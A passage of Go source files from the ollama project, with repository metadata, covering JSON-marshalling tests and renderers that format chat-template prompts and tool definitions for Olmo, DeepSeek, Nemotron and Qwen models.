`ends\\"`}, expected: `{"text": "ends\\\\\""}`, }, { name: "unicode with escapes", input: map[string]any{"text": "Hello\n世界\t😀"}, expected: `{"text": "Hello\n世界\t😀"}`, }, // Real-world tool call example { name: "tool call arguments", input: map[string]any{ "location": "San Francisco, CA", "unit": "fahrenheit", "format": "json", }, expected: `{"format": "json", "location": "San Francisco, CA", "unit": "fahrenheit"}`, }, { name: "complex tool arguments with escapes", input: map[string]any{ "query": `SELECT * FROM "users" WHERE name = 'O'Brien'`, "description": "Fetch user\ndata from DB", "path": `C:\data\users.db`, }, expected: `{"description": "Fetch user\ndata from DB", "path": "C:\\data\\users.db", "query": "SELECT * FROM \"users\" WHERE name = 'O'Brien'"}`, }, { name: "unicode immediately adjacent to JSON structure chars", input: map[string]any{"😀key": "😀value", "test": "😀:😀,😀"}, expected: `{"test": "😀:😀,😀", "😀key": "😀value"}`, }, { name: "long unicode string stress test", input: map[string]any{"text": "😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟"}, expected: `{"text": "😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟"}`, }, { name: "deeply nested with unicode everywhere", input: map[string]any{ "😀": map[string]any{ "你好": []any{"مرحبا", "®©™", "∑∫∂√"}, }, }, expected: `{"😀": {"你好": ["مرحبا", "®©™", "∑∫∂√"]}}`, }, { name: "unicode with all JSON special chars interleaved", input: map[string]any{"k😀:k": "v😀,v", "a:😀": "b,😀", "😀": ":,😀,:"}, expected: `{"a:😀": "b,😀", "k😀:k": "v😀,v", "😀": ":,😀,:"}`, }, { name: "combining diacritics and RTL text", input: map[string]any{"hebrew": "עִבְרִית", "combined": "é̀ñ", "mixed": "test:עִבְרִית,é̀ñ"}, expected: `{"combined": "é̀ñ", "hebrew": "עִבְרִית", "mixed": "test:עִבְרִית,é̀ñ"}`, }, { name: "pathological case: unicode + escapes + special chars", input: map[string]any{"😀": "test\n😀\"quote😀\\backslash😀:colon😀,comma😀"}, expected: `{"😀": "test\n😀\"quote😀\\backslash😀:colon😀,comma😀"}`, }, // all JSON structural characters inside strings { name: "braces and brackets in strings", input: map[string]any{"text": "test{with}braces[and]brackets"}, expected: `{"text": "test{with}braces[and]brackets"}`, }, { name: "braces and brackets with colons and commas", input: map[string]any{"code": "{key:value,[1,2,3]}"}, expected: `{"code": "{key:value,[1,2,3]}"}`, }, { name: "json-like string with all structural chars", input: map[string]any{"schema": `{"type":"object","properties":{"name":{"type":"string"},"items":{"type":"array"}}}`}, expected: `{"schema": "{\"type\":\"object\",\"properties\":{\"name\":{\"type\":\"string\"},\"items\":{\"type\":\"array\"}}}"}`, }, // forward slash tests (JSON allows \/ as an escape sequence) { name: "forward slash in URL", input: map[string]any{"url": "https://example.com/path/to/resource"}, expected: `{"url": "https://example.com/path/to/resource"}`, }, { name: "regex pattern with slashes", input: map[string]any{"regex": "/[a-z]+/gi"}, expected: `{"regex": "/[a-z]+/gi"}`, }, // all JSON escape sequences { name: "backspace escape", input: map[string]any{"text": "before\bafter"}, expected: `{"text": "before\bafter"}`, }, { name: "form feed escape", input: map[string]any{"text": "before\fafter"}, expected: `{"text": "before\fafter"}`, }, { name: "all standard escapes combined", input: map[string]any{"text": "\"\\\b\f\n\r\t"}, expected: `{"text": "\"\\\b\f\n\r\t"}`, }, // unicode escape sequences { name: "string that forces unicode escapes", input: map[string]any{"control": "\u0000\u0001\u001f"}, expected: `{"control": "\u0000\u0001\u001f"}`, }, // empty objects and arrays nested with strings { name: "nested empty structures with string values", input: map[string]any{"empty_obj": map[string]any{}, "empty_arr": []any{}, "text": "{}[]"}, expected: `{"empty_arr": [], "empty_obj": {}, "text": "{}[]"}`, }, // complex nesting with all structural characters { name: "deeply nested with all char types", input: map[string]any{ "level1": map[string]any{ "array": []any{ map[string]any{"nested": "value:with,special{chars}[here]"}, []any{"a", "b", "c"}, }, }, }, expected: `{"level1": {"array": [{"nested": "value:with,special{chars}[here]"}, ["a", "b", "c"]]}}`, }, // string containing escaped structural characters { name: "string with multiple escape sequences and structural chars", input: map[string]any{"data": "test\"quote\"{brace}[bracket]:colon,comma\\backslash/slash"}, expected: `{"data": "test\"quote\"{brace}[bracket]:colon,comma\\backslash/slash"}`, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { result, err := marshalWithSpaces(tt.input) if err != nil { t.Fatalf("marshalWithSpaces failed: %v", err) } resultStr := string(result) if diff := cmp.Diff(resultStr, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/renderer_test.go
model/renderers/renderer_test.go
package renderers import ( "testing" "github.com/ollama/ollama/api" ) type mockRenderer struct{} func (m *mockRenderer) Render(msgs []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) { return "mock-output", nil } func TestRegisterCustomRenderer(t *testing.T) { // Register a custom renderer Register("custom-renderer", func() Renderer { return &mockRenderer{} }) // Retrieve and use it result, err := RenderWithRenderer("custom-renderer", nil, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result != "mock-output" { t.Errorf("expected 'mock-output', got %q", result) } } func TestBuiltInRendererStillWorks(t *testing.T) { // Test that qwen3-coder still works messages := []api.Message{ {Role: "user", Content: "Hello"}, } result, err := RenderWithRenderer("qwen3-coder", messages, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result == "" { t.Error("expected non-empty result from qwen3-coder renderer") } } func TestOverrideBuiltInRenderer(t *testing.T) { // Override the built-in renderer Register("qwen3-coder", func() Renderer { return &mockRenderer{} }) // Should get the override result, err := RenderWithRenderer("qwen3-coder", nil, nil, nil) if err != nil { t.Fatalf("unexpected error: %v", err) } if result != "mock-output" { t.Errorf("expected 'mock-output' from override, got %q", result) } } func TestUnknownRendererReturnsError(t *testing.T) { _, err := RenderWithRenderer("nonexistent-renderer", nil, nil, nil) if err == nil { t.Error("expected error for unknown renderer") } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_think.go
model/renderers/olmo3_think.go
package renderers import ( "strings" "github.com/ollama/ollama/api" ) type Olmo3ThinkVariant int const ( // Olmo3Think32B is for allenai/Olmo-3-32B-Think Olmo3Think32B Olmo3ThinkVariant = iota // Olmo31Think is for allenai/Olmo-3-7B-Think and allenai/Olmo-3.1-32B-Think (includes model info) Olmo31Think ) const ( olmo3ThinkFunctionsSuffix = " You do not currently have access to any functions. <functions></functions>" olmo3Think32BSystemMessage = "You are a helpful AI assistant." olmo31ThinkSystemMessage = "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai." ) type Olmo3ThinkRenderer struct { Variant Olmo3ThinkVariant } func (r *Olmo3ThinkRenderer) Render(messages []api.Message, _ []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder var systemMessage *api.Message filteredMessages := make([]api.Message, 0, len(messages)) for i, message := range messages { if message.Role == "system" { if systemMessage == nil { systemMessage = &messages[i] } continue } // Skip tool messages - Think models don't support tools if message.Role == "tool" { continue } filteredMessages = append(filteredMessages, message) } sb.WriteString("<|im_start|>system\n") if systemMessage != nil { sb.WriteString(systemMessage.Content) sb.WriteString(olmo3ThinkFunctionsSuffix) } else { // Default system message varies by variant switch r.Variant { case Olmo3Think32B: sb.WriteString(olmo3Think32BSystemMessage) default: // Olmo3Think7B, Olmo31Think use same template - diverges from HF but confirmed difference from team sb.WriteString(olmo31ThinkSystemMessage) } } sb.WriteString("<|im_end|>\n") for _, message := range filteredMessages { switch message.Role { case "user": sb.WriteString("<|im_start|>user\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "assistant": sb.WriteString("<|im_start|>assistant\n") if message.Content != "" { sb.WriteString(message.Content) } sb.WriteString("<|im_end|>\n") } } // Always add generation prompt with <think> tag for thinking models sb.WriteString("<|im_start|>assistant\n<think>") return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3.go
model/renderers/olmo3.go
package renderers import ( "encoding/json" "fmt" "sort" "strings" "github.com/ollama/ollama/api" ) const ( olmo3DefaultSystemMessage = "You are a helpful function-calling AI assistant. " olmo31DefaultSystemMessage = "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai. " olmo3NoFunctionsMessage = "You do not currently have access to any functions. " olmo3WithFunctionsMessage = "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." ) type Olmo3Renderer struct { UseExtendedSystemMessage bool } func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder var systemMessage *api.Message filteredMessages := make([]api.Message, 0, len(messages)) for i, message := range messages { if message.Role == "system" { if systemMessage == nil { systemMessage = &messages[i] } continue } filteredMessages = append(filteredMessages, message) } // Render system message if systemMessage != nil { // Custom system message - single newline after "system" sb.WriteString("<|im_start|>system\n") sb.WriteString(systemMessage.Content) if len(tools) > 0 { functionsJSON, err := marshalWithSpaces(tools) if err != nil { return "", err } sb.WriteString("<functions>") sb.WriteString(string(functionsJSON)) sb.WriteString("</functions>") } sb.WriteString("<|im_end|>\n") } else { // Default system message - single newline after "system" sb.WriteString("<|im_start|>system\n") if r.UseExtendedSystemMessage { sb.WriteString(olmo31DefaultSystemMessage) } else { sb.WriteString(olmo3DefaultSystemMessage) } if len(tools) > 0 { functionsJSON, err := marshalWithSpaces(tools) if err != nil { return "", err } sb.WriteString(olmo3WithFunctionsMessage) sb.WriteString("<functions>") sb.WriteString(string(functionsJSON)) sb.WriteString("</functions>") } else { sb.WriteString(olmo3NoFunctionsMessage) sb.WriteString("<functions></functions>") } sb.WriteString("<|im_end|>\n") } for i, message := range filteredMessages { lastMessage := i == len(filteredMessages)-1 switch message.Role { case "user": sb.WriteString("<|im_start|>user\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "assistant": sb.WriteString("<|im_start|>assistant\n") if message.Content != "" { sb.WriteString(message.Content) } if len(message.ToolCalls) > 0 { sb.WriteString("<function_calls>") for j, tc := range message.ToolCalls { // Format as function_name(arg1="value1", arg2="value2") sb.WriteString(tc.Function.Name) sb.WriteString("(") // Get sorted keys for deterministic output keys := make([]string, 0, tc.Function.Arguments.Len()) for k := range tc.Function.Arguments.All() { keys = append(keys, k) } sort.Strings(keys) for k, key := range keys { if k > 0 { sb.WriteString(", ") } val, _ := tc.Function.Arguments.Get(key) value, err := json.Marshal(val) if err != nil { return "", err } sb.WriteString(fmt.Sprintf("%s=%s", key, string(value))) } sb.WriteString(")") if j < len(message.ToolCalls)-1 { sb.WriteString("\n") } } sb.WriteString("</function_calls>") } // Add end tag unless it's the last message with content only (prefill) if !lastMessage || len(message.ToolCalls) > 0 { sb.WriteString("<|im_end|>\n") } case "tool": sb.WriteString("<|im_start|>environment\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") } } // Add generation prompt if needed needsGenerationPrompt := true if len(filteredMessages) > 0 { lastMsg := filteredMessages[len(filteredMessages)-1] if lastMsg.Role == "assistant" && len(lastMsg.ToolCalls) == 0 && lastMsg.Content != "" { needsGenerationPrompt = false } } if needsGenerationPrompt { sb.WriteString("<|im_start|>assistant\n") } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/deepseek3.go
model/renderers/deepseek3.go
package renderers import ( "encoding/json" "strings" "github.com/ollama/ollama/api" ) type DeepSeek3Variant int const ( Deepseek31 DeepSeek3Variant = iota ) type DeepSeek3Renderer struct { IsThinking bool Variant DeepSeek3Variant } func (r *DeepSeek3Renderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder // thinking is enabled: model must support it AND user must request it thinking := r.IsThinking && (thinkValue != nil && thinkValue.Bool()) // extract system messages first var systemPrompt strings.Builder isFirstSystemPrompt := true for _, message := range messages { if message.Role == "system" { if isFirstSystemPrompt { systemPrompt.WriteString(message.Content) isFirstSystemPrompt = false } else { systemPrompt.WriteString("\n\n" + message.Content) } } } sb.WriteString("<|begin▁of▁sentence|>") sb.WriteString(systemPrompt.String()) // tool definitions if len(tools) > 0 { sb.WriteString("\n\n## Tools\nYou have access to the following tools:\n") for _, tool := range tools { sb.WriteString("\n### " + tool.Function.Name) sb.WriteString("\nDescription: " + tool.Function.Description) // parameters as JSON parametersJSON, err := json.Marshal(tool.Function.Parameters) if err == nil { sb.WriteString("\n\nParameters: " + string(parametersJSON) + "\n") } } // usage instructions sb.WriteString("\nIMPORTANT: ALWAYS adhere to this exact format for tool use:\n") sb.WriteString("<|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|>\n\n") sb.WriteString("Where:\n\n") sb.WriteString("- `tool_call_name` must be an exact match to one of the available tools\n") sb.WriteString("- `tool_call_arguments` must be valid JSON that strictly follows the tool's Parameters Schema\n") sb.WriteString("- For multiple tool calls, chain them directly without separators or spaces\n") } // state tracking isTool := false isLastUser := false // Find the index of the last user message to determine which assistant message is "current" lastUserIndex := -1 for i := len(messages) - 1; i >= 0; i-- { if messages[i].Role == "user" { lastUserIndex = i break } } for i, message := range messages { switch message.Role { case "user": isTool = false isLastUser = true sb.WriteString("<|User|>" + message.Content) case "assistant": if len(message.ToolCalls) > 0 { if isLastUser { sb.WriteString("<|Assistant|></think>") } isLastUser = false isTool = false if message.Content != "" { sb.WriteString(message.Content) } sb.WriteString("<|tool▁calls▁begin|>") for _, toolCall := range message.ToolCalls { sb.WriteString("<|tool▁call▁begin|>" + toolCall.Function.Name + "<|tool▁sep|>") argsJSON, _ := json.Marshal(toolCall.Function.Arguments) sb.WriteString(string(argsJSON)) sb.WriteString("<|tool▁call▁end|>") } sb.WriteString("<|tool▁calls▁end|><|end▁of▁sentence|>") } else { if isLastUser { sb.WriteString("<|Assistant|>") hasThinking := message.Thinking != "" // only use <think> for the current turn (after last user message) isCurrentTurn := i > lastUserIndex if hasThinking && thinking && isCurrentTurn { sb.WriteString("<think>") } else { sb.WriteString("</think>") } } isLastUser = false content := message.Content if isTool { sb.WriteString(content + "<|end▁of▁sentence|>") isTool = false } else { if strings.Contains(content, "</think>") { parts := strings.SplitN(content, "</think>", 2) if len(parts) > 1 { content = parts[1] } } sb.WriteString(content + "<|end▁of▁sentence|>") } } case "tool": isLastUser = false isTool = true sb.WriteString("<|tool▁output▁begin|>" + message.Content + "<|tool▁output▁end|>") } } if isLastUser && !isTool { sb.WriteString("<|Assistant|>") if thinking { sb.WriteString("<think>") } else { sb.WriteString("</think>") } } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/nemotron3nano.go
model/renderers/nemotron3nano.go
package renderers import ( "encoding/json" "fmt" "strings" "github.com/ollama/ollama/api" ) type Nemotron3NanoRenderer struct{} func (r *Nemotron3NanoRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder // thinking is enabled if user requests it enableThinking := thinkValue != nil && thinkValue.Bool() // Extract system message if present var systemMessage string var loopMessages []api.Message if len(messages) > 0 && messages[0].Role == "system" { systemMessage = messages[0].Content loopMessages = messages[1:] } else { loopMessages = messages } // Find last user message index for thinking truncation lastUserIdx := -1 for i, msg := range loopMessages { if msg.Role == "user" { lastUserIdx = i } } sb.WriteString("<|im_start|>system\n") if systemMessage != "" { sb.WriteString(systemMessage) } if len(tools) > 0 { if systemMessage != "" { sb.WriteString("\n\n") } sb.WriteString(r.renderTools(tools)) } sb.WriteString("<|im_end|>\n") for i, message := range loopMessages { switch message.Role { case "assistant": // Build content with thinking tags content := r.buildContent(message) shouldTruncate := i < lastUserIdx if len(message.ToolCalls) > 0 { sb.WriteString("<|im_start|>assistant\n") sb.WriteString(r.formatContent(content, shouldTruncate, true)) r.writeToolCalls(&sb, message.ToolCalls) sb.WriteString("<|im_end|>\n") } else { formatted := r.formatContent(content, shouldTruncate, false) sb.WriteString("<|im_start|>assistant\n" + formatted + "<|im_end|>\n") } case "user", "system": sb.WriteString("<|im_start|>" + message.Role + "\n") sb.WriteString(message.Content) sb.WriteString("<|im_end|>\n") case "tool": // Check if previous message was also a tool message prevWasTool := i > 0 && loopMessages[i-1].Role == "tool" nextIsTool := i+1 < len(loopMessages) && loopMessages[i+1].Role == "tool" if !prevWasTool { sb.WriteString("<|im_start|>user\n") } sb.WriteString("<tool_response>\n") sb.WriteString(message.Content) sb.WriteString("\n</tool_response>\n") if !nextIsTool { sb.WriteString("<|im_end|>\n") } default: sb.WriteString("<|im_start|>" + message.Role + "\n" + message.Content + "<|im_end|>\n") } } // Add generation prompt if enableThinking { sb.WriteString("<|im_start|>assistant\n<think>\n") } else { sb.WriteString("<|im_start|>assistant\n<think></think>") } return sb.String(), nil } func (r *Nemotron3NanoRenderer) renderTools(tools []api.Tool) string { var sb strings.Builder sb.WriteString("# Tools\n\nYou have access to the following functions:\n\n<tools>") for _, tool := range tools { fn := tool.Function sb.WriteString("\n<function>\n<name>" + fn.Name + "</name>") if fn.Description != "" { sb.WriteString("\n<description>" + strings.TrimSpace(fn.Description) + "</description>") } sb.WriteString("\n<parameters>") if fn.Parameters.Properties != nil { for paramName, paramFields := range fn.Parameters.Properties.All() { sb.WriteString("\n<parameter>") sb.WriteString("\n<name>" + paramName + "</name>") if len(paramFields.Type) > 0 { sb.WriteString("\n<type>" + strings.Join(paramFields.Type, ", ") + "</type>") } if paramFields.Description != "" { sb.WriteString("\n<description>" + strings.TrimSpace(paramFields.Description) + "</description>") } if len(paramFields.Enum) > 0 { enumJSON, _ := json.Marshal(paramFields.Enum) sb.WriteString("\n<enum>" + string(enumJSON) + "</enum>") } sb.WriteString("\n</parameter>") } } if len(fn.Parameters.Required) > 0 { reqJSON, _ := json.Marshal(fn.Parameters.Required) sb.WriteString("\n<required>" + string(reqJSON) + "</required>") } sb.WriteString("\n</parameters>") sb.WriteString("\n</function>") } sb.WriteString("\n</tools>") sb.WriteString("\n\nIf you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n</IMPORTANT>") return sb.String() } func (r *Nemotron3NanoRenderer) buildContent(message api.Message) string { // The parser always extracts thinking into the Thinking field, // so Content will never have <think> tags embedded if message.Thinking != "" { return "<think>\n" + message.Thinking + "\n</think>\n" + message.Content } return "<think></think>" + message.Content } func (r *Nemotron3NanoRenderer) formatContent(content string, truncate bool, addNewline bool) string { if content == "" { return "<think></think>" } if !truncate { if addNewline { return strings.TrimSpace(content) + "\n" } return strings.TrimSpace(content) } // Truncate thinking - keep only content after </think> c := content if strings.Contains(c, "</think>") { parts := strings.Split(c, "</think>") c = parts[len(parts)-1] } else if strings.Contains(c, "<think>") { parts := strings.Split(c, "<think>") c = parts[0] } c = "<think></think>" + strings.TrimSpace(c) if addNewline && len(c) > len("<think></think>") { return c + "\n" } if c == "<think></think>" { return c } return strings.TrimSpace(c) } func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) { for _, tc := range toolCalls { sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n") for name, value := range tc.Function.Arguments.All() { sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n") } sb.WriteString("</function>\n</tool_call>\n") } } func (r *Nemotron3NanoRenderer) formatArgValue(value any) string { switch v := value.(type) { case map[string]any, []any: jsonBytes, _ := json.Marshal(v) return string(jsonBytes) default: return fmt.Sprintf("%v", v) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/testhelpers_test.go
model/renderers/testhelpers_test.go
package renderers import "github.com/ollama/ollama/api" // testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved) func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap { props := api.NewToolPropertiesMap() for k, v := range m { props.Set(k, v) } return props } // testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved) func testArgs(m map[string]any) api.ToolCallFunctionArguments { args := api.NewToolCallFunctionArguments() for k, v := range m { args.Set(k, v) } return args } // orderedArg represents a key-value pair for ordered argument creation type orderedArg struct { Key string Value any } // testArgsOrdered creates ToolCallFunctionArguments with a specific key order func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments { args := api.NewToolCallFunctionArguments() for _, p := range pairs { args.Set(p.Key, p.Value) } return args } // orderedProp represents a key-value pair for ordered property creation type orderedProp struct { Key string Value api.ToolProperty } // testPropsOrdered creates a ToolPropertiesMap with a specific key order func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap { props := api.NewToolPropertiesMap() for _, p := range pairs { props.Set(p.Key, p.Value) } return props }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl.go
model/renderers/qwen3vl.go
package renderers import ( "strings" "github.com/ollama/ollama/api" ) type Qwen3VLRenderer struct { isThinking bool useImgTags bool } func (r *Qwen3VLRenderer) renderContent(content api.Message) string { // This assumes all images are at the front of the message - same assumption as ollama/ollama/runner.go var subSb strings.Builder for range content.Images { // TODO: (jmorganca): how to render this is different for different // model backends, and so we should eventually parameterize this or // only output a placeholder such as [img] if r.useImgTags { subSb.WriteString("[img]") } else { subSb.WriteString("<|vision_start|><|image_pad|><|vision_end|>") } } // TODO: support videos subSb.WriteString(content.Content) return subSb.String() } func (r *Qwen3VLRenderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder if len(tools) > 0 { sb.WriteString(imStartTag + "system\n") if len(messages) > 0 && messages[0].Role == "system" { sb.WriteString(messages[0].Content + "\n\n") } sb.WriteString("# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>") for _, tool := range tools { sb.WriteString("\n") if b, err := marshalWithSpaces(tool); err == nil { sb.Write(b) } } sb.WriteString("\n</tools>\n\nFor each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags:\n<tool_call>\n{\"name\": <function-name>, \"arguments\": <args-json-object>}\n</tool_call><|im_end|>\n") } else if len(messages) > 0 && messages[0].Role == "system" { sb.WriteString("<|im_start|>system\n" + messages[0].Content + "<|im_end|>\n") } multiStepTool := true lastQueryIndex := len(messages) - 1 // so this is the last user message for i := len(messages) - 1; i >= 0; i-- { message := messages[i] if multiStepTool && message.Role == "user" { // Check if content starts with <tool_response> and ends with </tool_response> content := r.renderContent(message) if !(strings.HasPrefix(content, "<tool_response>") && strings.HasSuffix(content, "</tool_response>")) { multiStepTool = false lastQueryIndex = i } } } for i, message := range messages { content := r.renderContent(message) lastMessage := i == len(messages)-1 prefill := lastMessage && message.Role == "assistant" if message.Role == "user" || message.Role == "system" && i != 0 { sb.WriteString("<|im_start|>" + message.Role + "\n" + content + "<|im_end|>\n") } else if message.Role == "assistant" { contentReasoning := "" if r.isThinking { if message.Thinking != "" { contentReasoning = message.Thinking } } if r.isThinking && i > lastQueryIndex { if i == len(messages)-1 || contentReasoning != "" { sb.WriteString("<|im_start|>" + message.Role + "\n<think>\n" + strings.Trim(contentReasoning, "\n")) // do we want to add a new line here? if content != "" { sb.WriteString("\n</think>\n\n" + strings.TrimLeft(content, "\n")) } } else { sb.WriteString("<|im_start|>" + message.Role + "\n" + content) } } else { sb.WriteString("<|im_start|>" + message.Role + "\n" + content) } if len(message.ToolCalls) > 0 { for j, toolCall := range message.ToolCalls { if j > 0 || content != "" { sb.WriteString("\n") } sb.WriteString("<tool_call>\n{\"name\": \"" + toolCall.Function.Name + "\", \"arguments\": ") if b, err := marshalWithSpaces(toolCall.Function.Arguments); err == nil { sb.Write(b) } sb.WriteString("}\n</tool_call>") } } if !prefill { sb.WriteString("<|im_end|>\n") } } else if message.Role == "tool" { if i == 0 || messages[i-1].Role != "tool" { sb.WriteString("<|im_start|>user") } sb.WriteString("\n<tool_response>\n" + message.Content + "\n</tool_response>") if i == len(messages)-1 || messages[i+1].Role != "tool" { sb.WriteString("<|im_end|>\n") } } // prefill at the end if lastMessage && !prefill { sb.WriteString("<|im_start|>assistant\n") if r.isThinking { sb.WriteString("<think>\n") } } } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3coder.go
model/renderers/qwen3coder.go
package renderers import ( "encoding/json" "fmt" "reflect" "strings" "github.com/ollama/ollama/api" ) var ( imStartTag = "<|im_start|>" imEndTag = "<|im_end|>" ) // renderAdditionalKeys renders all JSON fields except the ones in handledKeys // This follows the same approach from the reference implementation, which gives // a particular key ordering func renderAdditionalKeys(obj any, handledKeys map[string]bool) string { data, err := json.Marshal(obj) if err != nil { return "" } var m map[string]any if err := json.Unmarshal(data, &m); err != nil { return "" } var sb strings.Builder for key, value := range m { if handledKeys[key] { continue } // Check if value is a map or array (needs JSON serialization) switch v := value.(type) { case map[string]any, []any: jsonBytes, _ := json.Marshal(v) // TODO(drifkin): it would be nice to format the JSON here similarly to // python's default json.dumps behavior (spaces after commas and colons). // This would let us be byte-for-byte compatible with the reference // implementation for most common inputs jsonStr := string(jsonBytes) sb.WriteString("\n<" + key + ">" + jsonStr + "</" + key + ">") case nil: continue default: // Simple types, convert to string sb.WriteString("\n<" + key + ">" + fmt.Sprintf("%v", value) + "</" + key + ">") } } return sb.String() } type Qwen3CoderRenderer struct{} func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder // filter out system messages and choose the first (if any) to win var systemMessage string var filteredMessages []api.Message for _, message := range messages { if message.Role != "system" { filteredMessages = append(filteredMessages, message) continue } if systemMessage == "" { systemMessage = message.Content } } if systemMessage != "" || len(tools) > 0 { sb.WriteString(imStartTag + "system\n") // if we have tools but no system message, match the reference implementation by providing a default system message if systemMessage == "" { systemMessage = "You are Qwen, a helpful AI assistant that can interact with a computer to solve tasks." } sb.WriteString(systemMessage) if len(tools) > 0 { sb.WriteString("\n\n# Tools\n\nYou have access to the following functions:\n\n") sb.WriteString("<tools>") for _, tool := range tools { sb.WriteString("\n") sb.WriteString("<function>\n") sb.WriteString("<name>" + tool.Function.Name + "</name>") if tool.Function.Description != "" { sb.WriteString("\n<description>" + tool.Function.Description + "</description>") } sb.WriteString("\n<parameters>") for name, prop := range tool.Function.Parameters.Properties.All() { sb.WriteString("\n<parameter>") sb.WriteString("\n<name>" + name + "</name>") if len(prop.Type) > 0 { sb.WriteString("\n<type>" + formatToolDefinitionType(prop.Type) + "</type>") } if prop.Description != "" { sb.WriteString("\n<description>" + prop.Description + "</description>") } // Render any additional keys not already handled handledKeys := map[string]bool{ "type": true, "description": true, } sb.WriteString(renderAdditionalKeys(prop, handledKeys)) sb.WriteString("\n</parameter>") } // Render extra keys for parameters (everything except 'type' and 'properties') paramHandledKeys := map[string]bool{ "type": true, "properties": true, } sb.WriteString(renderAdditionalKeys(tool.Function.Parameters, paramHandledKeys)) sb.WriteString("\n</parameters>") sb.WriteString("\n</function>") } sb.WriteString("\n</tools>") sb.WriteString("\n\nIf you choose to call a function ONLY reply in the following format with NO suffix:\n\n<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n- Required parameters MUST be specified\n- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n</IMPORTANT>") } sb.WriteString(imEndTag + "\n") } for i, message := range filteredMessages { lastMessage := i == 